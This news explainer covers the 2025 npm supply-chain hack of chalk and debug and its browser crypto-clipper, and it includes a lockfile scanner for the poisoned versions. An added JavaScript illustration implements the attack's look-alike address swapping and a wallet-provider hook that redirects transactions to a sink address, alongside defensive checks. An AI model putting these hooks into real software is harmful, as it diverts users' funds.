
Unveiling the Impact of the NPM Supply Chain Hack

One of the largest compromises in software supply chain history, measured by downloads, has shaken the entire JavaScript and crypto ecosystem. Packages pulled billions of times a week were poisoned, Ethereum and Solana wallets were targeted, and developers were forced to react urgently. And yet, in the end, the attacker collected only a few cents of ether and a handful of illiquid memecoins.

A brutal paradox: the scale of the attack is colossal, but the direct financial impact is minuscule. The real costs lie elsewhere: hours of audit work, forced updates, and a lasting loss of trust in the packages that underpin the web.

How the NPM hack took shape

It all started with a simple phishing email impersonating npm support. The maintainer known as "qix", who maintains widely used libraries such as chalk and debug, had his npm credentials stolen. With full publishing access, the attacker pushed malicious versions of the packages he maintained, which together are downloaded billions of times a week.

The malicious code was sneaky: it ran only in the browser, where it checked for window.ethereum and hooked the wallet provider's request path, rewriting transactions and ERC-20 calls such as approve and transfer so that funds went to a single attacker-controlled Ethereum address. On Solana it did not even try to profit: recipient addresses were overwritten with an invalid string, so transfers simply failed.

Even more cunning, the malware hooked fetch and XMLHttpRequest, scanned responses for crypto addresses and swapped each one for the closest look-alike (by string edit distance) among some 280 attacker-controlled addresses, so that a user checking only the first and last characters would notice nothing. A true next-generation "crypto-clipper".
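To make the two substitution techniques concrete, here is an added illustration written for this article. It is not the malware's code and the addresses, the attacker list and the provider object are constructed for the example; it models a look-alike swap in a response body, a single-sink redirect on an EIP-1193 provider, and the two cheap checks a wallet or dApp can run against them.

```javascript
// Added illustration for this article, not the malware's code. All addresses
// below are constructed for the example. Runs unchanged in Node or a browser.

// An EVM address is "0x" followed by 40 hex digits.
const EVM_ADDRESS_RE = /0x[0-9a-fA-F]{40}/g;

// Levenshtein edit distance between two strings (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Technique 1 (network layer): pick, from the attacker's list, the address that
// looks most like the one the victim is about to see, so a glance at the first
// and last characters does not reveal the swap.
function pickLookalike(original, attackerAddresses) {
  let best = attackerAddresses[0];
  let bestDistance = Infinity;
  for (const candidate of attackerAddresses) {
    const d = levenshtein(original.toLowerCase(), candidate.toLowerCase());
    if (d < bestDistance) {
      bestDistance = d;
      best = candidate;
    }
  }
  return best;
}

// Rewrite every EVM address in a response body (what a hooked fetch/XHR does).
function clipAddresses(body, attackerAddresses) {
  return body.replace(EVM_ADDRESS_RE, (addr) => pickLookalike(addr, attackerAddresses));
}

// Technique 2 (wallet layer): wrap a provider's request() so that every
// eth_sendTransaction is redirected to one sink address. A real payload would
// also rewrite ERC-20 approve/transfer calldata; that part is omitted here.
function hookProvider(provider, sinkAddress) {
  const originalRequest = provider.request.bind(provider);
  provider.request = (args) => {
    if (args && args.method === 'eth_sendTransaction' && Array.isArray(args.params)) {
      args = { ...args, params: args.params.map((tx) => ({ ...tx, to: sinkAddress })) };
    }
    return originalRequest(args);
  };
  return provider;
}

// Defence 1: compare the address about to be signed with the one the user
// intended, in full and case-insensitively; never rely on a prefix/suffix glance.
function addressMatchesIntent(intended, observed) {
  return intended.toLowerCase() === observed.toLowerCase();
}

// Defence 2 (heuristic): a wrapped fetch/XHR/request is no longer a native
// function. A payload can fake toString as well, so treat this as a signal only.
// Note: in Node, fetch itself is implemented in JavaScript, so test a built-in.
function looksNative(fn) {
  return typeof fn === 'function' &&
    /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// --- constructed demo data --------------------------------------------------
const VICTIM = '0x1234567890abcdef1234567890abcdef12345678';
const ATTACKER_LIST = [
  '0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef',
  '0x1234567890abcdef1234567890abcdef12345699', // differs only in the last two digits
  '0x12345678aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',
];
const SAMPLE_BODY = JSON.stringify({ recipient: VICTIM, amount: '1.5' });

const clippedRecipient = JSON.parse(clipAddresses(SAMPLE_BODY, ATTACKER_LIST)).recipient;
const fakeProvider = hookProvider({ request: (args) => args }, ATTACKER_LIST[0]);
const sent = fakeProvider.request({ method: 'eth_sendTransaction', params: [{ to: VICTIM, value: '0x1' }] });

console.log('look-alike swapped into body:', clippedRecipient);
console.log('provider hook redirected to:', sent.params[0].to);
console.log('intent check catches the swap:', !addressMatchesIntent(VICTIM, clippedRecipient));
console.log('hooked request looks native:', looksNative(fakeProvider.request));
```

The intent check is the one that actually holds: the look-alike is chosen precisely so that a human eye misses it, so the comparison must be done by code, in full, against the address the user typed or selected, not against whatever the page currently displays.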

A mountain for a mouse

Despite this sophistication, the gains are derisory: about five cents of ETH and around 20 dollars of an obscure memecoin. The report released on Tuesday by Security Alliance confirms that the attacker left empty-handed, or close to it.

But the story does not end there. Behind this apparent failure, another cost emerges: cleanup. Security teams must audit, pin, patch and update. Every project that pulled a compromised version, whether it ships that code to a browser or not, must be reviewed, and that bill runs into millions.
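The first step of that cleanup is finding out whether a lockfile ever resolved one of the poisoned versions. Below is an added example for this article, not a tool from npm or from the affected projects: a scanner over an npm package-lock.json that understands both the lockfileVersion 2/3 "packages" map and the older nested "dependencies" tree. The version table holds the two packages the article names, with the versions the attacker published as recorded in the public advisories for this incident; the sample lockfiles are constructed. Extend the table from the advisory you are responding to before relying on it.

```javascript
// Added example for this article (not an official tool). Scans the parsed
// contents of an npm package-lock.json for known-bad versions.

// Versions published by the attacker, as recorded in the public advisories for
// this incident. Assumption: this is a starting point only; extend it from the
// advisory before use.
const KNOWN_BAD = {
  chalk: new Set(['5.6.1']),
  debug: new Set(['4.4.2']),
};

// Package name from a lockfile v2/v3 path such as
// "node_modules/foo/node_modules/@scope/bar" -> "@scope/bar".
function nameFromPath(path) {
  const marker = 'node_modules/';
  const idx = path.lastIndexOf(marker);
  return idx === -1 ? path : path.slice(idx + marker.length);
}

// Yields { name, version, where } for every installed package in the lockfile.
function* installedPackages(lock) {
  if (lock.packages) {
    // lockfileVersion 2 or 3: flat map keyed by install path.
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === '') continue; // the root project itself
      yield { name: nameFromPath(path), version: entry.version, where: path };
    }
    return;
  }
  // lockfileVersion 1: nested "dependencies" tree.
  function* walk(deps, prefix) {
    for (const [name, entry] of Object.entries(deps || {})) {
      const where = `${prefix}node_modules/${name}`;
      yield { name, version: entry.version, where };
      yield* walk(entry.dependencies, `${where}/`);
    }
  }
  yield* walk(lock.dependencies, '');
}

// Returns every installed package whose version is in the known-bad table.
function findCompromised(lock, table = KNOWN_BAD) {
  const hits = [];
  for (const pkg of installedPackages(lock)) {
    const bad = table[pkg.name];
    if (bad && bad.has(pkg.version)) hits.push(pkg);
  }
  return hits;
}

// Convenience wrapper for raw lockfile text.
function auditLockfileText(text, table = KNOWN_BAD) {
  return findCompromised(JSON.parse(text), table);
}

// --- constructed sample lockfiles -------------------------------------------
const SAMPLE_V3 = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/chalk': { version: '5.6.1' },                     // compromised
    'node_modules/debug': { version: '4.4.1' },                     // clean
    'node_modules/foo': { version: '2.0.0' },
    'node_modules/foo/node_modules/debug': { version: '4.4.2' },    // compromised, nested
  },
};

const SAMPLE_V1 = {
  lockfileVersion: 1,
  dependencies: {
    chalk: { version: '5.6.0' },                                    // clean
    bar: { version: '1.0.0', dependencies: { debug: { version: '4.4.2' } } },
  },
};

for (const hit of findCompromised(SAMPLE_V3)) {
  console.log(`compromised: ${hit.name}@${hit.version} at ${hit.where}`);
}
```

To run it against a real project, read package-lock.json from disk and pass the text to auditLockfileText. A clean lockfile is necessary but not sufficient: a node_modules tree installed with npm install rather than npm ci, or a CI cache populated while the poisoned versions were live, can still hold them, so check the installed tree and rebuild caches as well.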

Reactions from the crypto ecosystem

Ledger, through its CTO Charles Guillemet, noted that the infected packages totalled over a billion downloads and were designed to replace addresses in transactions without the user noticing. A clear warning: the threat was serious, even if the financial gains do not reflect it.

MetaMask, Rabby and Phantom, among other major wallets and apps, quickly reassured their users that the vast majority of the ecosystem was not affected. The risk remains for anyone who installed the poisoned versions during the window they were live and has not yet audited and rebuilt.

The real issue

This hack is a stark reminder: vulnerability lies not only in blockchains but also in the tooling we use to build on them. A single phishing email can compromise packages downloaded billions of times and endanger the entire crypto ecosystem.

In September 2025, at a time when attracting "normies" is still a challenge, the conclusion is clear: even when the attackers leave with almost empty pockets, the bill for the community is enormous. And trust will take time to rebuild.
